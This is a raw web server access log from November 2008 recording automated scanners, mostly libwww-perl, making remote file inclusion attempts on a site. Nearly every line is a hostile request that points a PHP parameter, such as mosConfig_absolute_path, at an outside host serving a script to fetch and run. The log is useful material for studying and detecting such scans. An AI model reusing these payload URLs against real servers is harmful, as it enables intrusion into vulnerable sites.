202.39.48.181 - - [10/Nov/2008:08:00:07 -0800] "GET /logs/access_080714.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:00:32 -0800] "GET /logs/access_080601.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:00:32 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:00:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:00:37 -0800] "GET /logs/access_080811.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:00:37 -0800] "GET /logs/access_080321.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:08:00:56 -0800] "GET /logs/access_081021.log//administrator/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:08:01:15 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:08:01:15 -0800] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:08:01:15 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:01:17 -0800] "GET /logs/access_080717.log/home.php?p=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:01:20 -0800] "GET /logs/access_081015.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.149.41 - - [10/Nov/2008:08:01:49 -0800] "GET /logs/?REX[INCLUDE_PATH]=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.55.149.41 - - [10/Nov/2008:08:01:50 -0800] "GET /?REX[INCLUDE_PATH]=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 200 94760 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:02:02 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:02:03 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:08:02:03 -0800] "GET /logs//index.php?option=http://segnet.free.fr/page/eva/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:08:02:05 -0800] "GET /index.php?option=http://segnet.free.fr/page/eva/id3.txt??? HTTP/1.1" 200 94730 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:02:13 -0800] "GET /logs/access_080715.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:02:13 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:02:13 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:02:36 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:02:36 -0800] "GET /logs/access_071227.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:02:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.249.149 - - [10/Nov/2008:08:02:45 -0800] "GET /forums/addpost_newpoll.php?thispath=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
209.200.249.149 - - [10/Nov/2008:08:02:45 -0800] "GET /logs//forums/addpost_newpoll.php?thispath=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:02:47 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:02:47 -0800] "GET /logs/access_080616.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:03:00 -0800] "GET /logs/access_081027.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:03:10 -0800] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:03:11 -0800] "GET /logs/access_081027.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:03:16 -0800] "GET /logs/access_071227.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:03:16 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:03:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:03:21 -0800] "GET /encapscms_PATH/core/core.php?root=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:04:09 -0800] "GET /logs/access_080922.log//classes/core/language.php?rootdir=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:04:09 -0800] "GET /classes/core/language.php?rootdir=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:04:10 -0800] "GET /logs//classes/core/language.php?rootdir=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:04:32 -0800] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:04:34 -0800] "GET /logs/access_080918.log//classes/core/language.php?rootdir=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:04:37 -0800] "GET /home.php?p=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.219.173.90 - - [10/Nov/2008:08:04:46 -0800] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.flirtys.org/imagespread/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.90 - - [10/Nov/2008:08:04:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.flirtys.org/imagespread/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.90 - - [10/Nov/2008:08:04:47 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.flirtys.org/imagespread/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.96.13 - - [10/Nov/2008:08:04:54 -0800] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fantalaranja.t35.com/idr0x.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:05:03 -0800] "GET /logs/access_080811.log/popup.php?path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:05:04 -0800] "GET /popup.php?path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:05:07 -0800] "GET /logs/popup.php?path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:05:14 -0800] "GET /logs/access_080619.log/canal.php?meio=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:05:14 -0800] "GET /canal.php?meio=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:05:14 -0800] "GET /logs/canal.php?meio=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:05:15 -0800] "GET /logs/access_080830.log/canal.php?meio=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:29 -0800] "GET /logs/access_081021.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:29 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:29 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:37 -0800] "GET /logs/access_081021.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:38 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:05:38 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.90 - - [10/Nov/2008:08:06:17 -0800] "GET /logs/access_080512.log//include/write.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:08:06:18 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:08:06:20 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:08:06:21 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.221 - - [10/Nov/2008:08:06:21 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.58.35.82 - - [10/Nov/2008:08:06:23 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.58.35.82 - - [10/Nov/2008:08:06:23 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.20.101 - - [10/Nov/2008:08:06:24 -0800] "GET /logs/access_080512.log//include/write.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:06:25 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:06:25 -0800] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:06:25 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:06:29 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:06:54 -0800] "GET /logs/encapscms_PATH/core/core.php?root=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:06:54 -0800] "GET /encapscms_PATH/core/core.php?root=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:07:03 -0800] "GET /logs/access_080412.log/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:07:03 -0800] "GET /logs/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 200 73021 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:07:04 -0800] "GET /?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 200 94709 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:08:07:06 -0800] "GET /logs/access_080831.log/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:07:47 -0800] "GET /logs/access_080412.log/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:07:47 -0800] "GET /logs/access_080831.log/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:07:47 -0800] "GET /logs/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 200 73021 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:07:48 -0800] "GET /?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 200 94725 "-" "libwww-perl/5.805" "www.dmulk.com"
200.101.66.123 - - [10/Nov/2008:08:07:54 -0800] "GET /logs/access_080919.log%20/?sourcedir=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:08:07:55 -0800] "GET /?page=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 200 94693 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:08:05 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:08:05 -0800] "GET /logs/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:08:05 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:08:05 -0800] "GET /errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.219.173.90 - - [10/Nov/2008:08:08:06 -0800] "GET /logs/access_081026.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.flirtys.org/imagespread/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:08:08:45 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:08:08:46 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:08:59 -0800] "GET /logs/access_080602.log/home.php?p=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:08:59 -0800] "GET /logs/home.php?p=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:08:59 -0800] "GET /home.php?p=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.154.56.4 - - [10/Nov/2008:08:09:05 -0800] "GET /forums/addpost_newpoll.php?thispath=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.154.56.4 - - [10/Nov/2008:08:09:05 -0800] "GET /logs/access_080212.log//forums/addpost_newpoll.php?thispath=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.154.56.4 - - [10/Nov/2008:08:09:06 -0800] "GET /logs/access_080302.log//forums/addpost_newpoll.php?thispath=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.154.56.4 - - [10/Nov/2008:08:09:06 -0800] "GET /logs//forums/addpost_newpoll.php?thispath=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:09:07 -0800] "GET /logs/access_080717.log/home.php?p=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:23 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:23 -0800] "GET /logs/access_080928.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:23 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:09:24 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:09:24 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:28 -0800] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:09:28 -0800] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:09:28 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:09:28 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:09:29 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:09:29 -0800] "GET /logs/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:09:29 -0800] "GET /errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:09:29 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:09:40 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:09:40 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:46 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:09:46 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
